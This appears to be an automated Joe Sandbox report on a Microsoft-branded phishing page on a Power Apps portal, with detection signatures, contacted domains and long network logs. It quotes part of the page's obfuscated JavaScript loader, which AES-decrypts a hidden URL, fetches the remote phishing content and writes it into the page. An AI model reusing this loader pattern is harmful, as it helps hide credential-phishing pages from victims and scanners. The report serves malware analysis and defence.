Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://12dec6c2-3c78-e425-b87e-b20197f5da10.powerappsportals.com/

Overview

General Information

Sample URL:https://12dec6c2-3c78-e425-b87e-b20197f5da10.powerappsportals.com/
Analysis ID:1500038

Detection

Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Phishing site detected (based on image similarity)
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)
HTML page contains hidden javascript code
HTML title does not match URL
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 6856 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://12dec6c2-3c78-e425-b87e-b20197f5da10.powerappsportals.com/ MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
    • chrome.exe (PID: 7044 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 --field-trial-handle=1948,i,11680625064609720610,96610402005877140,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • cleanup
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://12dec6c2-3c78-e425-b87e-b20197f5da10.powerappsportals.com/Avira URL Cloud: detection malicious, Label: phishing

Phishing

barindex
Source: https://12dec6c2-3c78-e425-b87e-b20197f5da10.powerappsportals.com/Matcher: Found strong image similarity, brand: MICROSOFT
Source: https://dashboard-home-mysharepoint.com/#test@test.comHTTP Parser: async function lacework(jackhammer) { <!-- <span>in the silence of the road, find clarity.</span> --> var { a, b, c, d } = json.parse(jackhammer); return cryptojs.aes.decrypt( a, cryptojs.pbkdf2(cryptojs.enc.hex.parse(d), cryptojs.enc.hex.parse(b), { hasher: cryptojs.algo.sha512, keysize: 64 / 8, iterations: 999, }), { iv: cryptojs.enc.hex.parse(c) } ).tostring(cryptojs.enc.utf8); } async function zestful() { lacquer.hidden = 0; earmuff.hidden = 1; document.write( await lacework( await ( await fetch( await lacework( atob( `eyjhijoieu8xzlhcl1nhv1wvou45ouzfmffmvvlqzutwytjjtgrywmriedlyt3vma2j3psisimmioiizngi1n2nimji1odi4mmrjmzk4mjrjm2y2zwi5owjiyiisimiioii1zjviyznkmtyymzhhnzezyta1zdezmjgxote3zmqzodhhowvknze5mza1ztjjyjk3zjmwytexztaymdi3mjbjmje3ytg2mje1zte3yjizndkwmmu5yjeynwzjymrlmzixnziyyjiwntc3zjfjmmuwodk3mza2mzfjmgzly2m2...
Source: https://dashboard-home-mysharepoint.com/#test@test.comHTTP Parser: Base64 decoded: {"version":3,"sourceRoot":"/cfsetup_build/src/orchestrator/turnstile/templates","sources":["turnstile.scss"],"names":[],"mappings":"AAmCA;EACI;IACI;;;AAIR;EACI;IACI;;;AAIR;EACI;IAEI;;EAGJ;IACI;;;AAIR;EACI;IACI;;;AAIR;EACI;IACI;;;AAIR;EACI;IACI;;;AAIR;EACI...
Source: https://12dec6c2-3c78-e425-b87e-b20197f5da10.powerappsportals.com/HTTP Parser: Title: Home does not match URL
Source: https://12dec6c2-3c78-e425-b87e-b20197f5da10.powerappsportals.com/HTTP Parser: No favicon
Source: https://dashboard-home-mysharepoint.com/#test@test.comHTTP Parser: No favicon
Source: https://dashboard-home-mysharepoint.com/#test@test.comHTTP Parser: No favicon
Source: https://12dec6c2-3c78-e425-b87e-b20197f5da10.powerappsportals.com/HTTP Parser: No <meta name="author".. found
Source: https://12dec6c2-3c78-e425-b87e-b20197f5da10.powerappsportals.com/HTTP Parser: No <meta name="copyright".. found
Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\Dictionaries
Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.17:49813 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.17:49843 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.17:49845 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.191.219.104:443 -> 192.168.2.17:49846 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.190.159.73:443 -> 192.168.2.17:49847 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.190.159.73:443 -> 192.168.2.17:49849 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.191.219.104:443 -> 192.168.2.17:49850 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.191.219.104:443 -> 192.168.2.17:49851 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.191.219.104:443 -> 192.168.2.17:49852 version: TLS 1.2
Source: unknownHTTPS traffic detected: 51.124.78.146:443 -> 192.168.2.17:49853 version: TLS 1.2
Source: unknownHTTPS traffic detected: 51.124.78.146:443 -> 192.168.2.17:49854 version: TLS 1.2
Source: unknownHTTPS traffic detected: 51.124.78.146:443 -> 192.168.2.17:49855 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.17:49857 version: TLS 1.2
Source: unknownHTTPS traffic detected: 2.23.209.160:443 -> 192.168.2.17:49858 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.17:49859 version: TLS 1.2
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: global trafficDNS traffic detected: DNS query: 12dec6c2-3c78-e425-b87e-b20197f5da10.powerappsportals.com
Source: global trafficDNS traffic detected: DNS query: content.powerapps.com
Source: global trafficDNS traffic detected: DNS query: superyachtstbarth.sharepoint.com
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: maxcdn.bootstrapcdn.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: stackpath.bootstrapcdn.com
Source: global trafficDNS traffic detected: DNS query: cdn.jsdelivr.net
Source: global trafficDNS traffic detected: DNS query: dashboard-home-mysharepoint.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: bizblitzed.com.de
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
Source: unknownNetwork traffic detected: HTTP traffic on port 49680 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49690
Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49690 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.17:49813 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.17:49843 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.17:49845 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.191.219.104:443 -> 192.168.2.17:49846 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.190.159.73:443 -> 192.168.2.17:49847 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.190.159.73:443 -> 192.168.2.17:49849 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.191.219.104:443 -> 192.168.2.17:49850 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.191.219.104:443 -> 192.168.2.17:49851 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.191.219.104:443 -> 192.168.2.17:49852 version: TLS 1.2
Source: unknownHTTPS traffic detected: 51.124.78.146:443 -> 192.168.2.17:49853 version: TLS 1.2
Source: unknownHTTPS traffic detected: 51.124.78.146:443 -> 192.168.2.17:49854 version: TLS 1.2
Source: unknownHTTPS traffic detected: 51.124.78.146:443 -> 192.168.2.17:49855 version: TLS 1.2
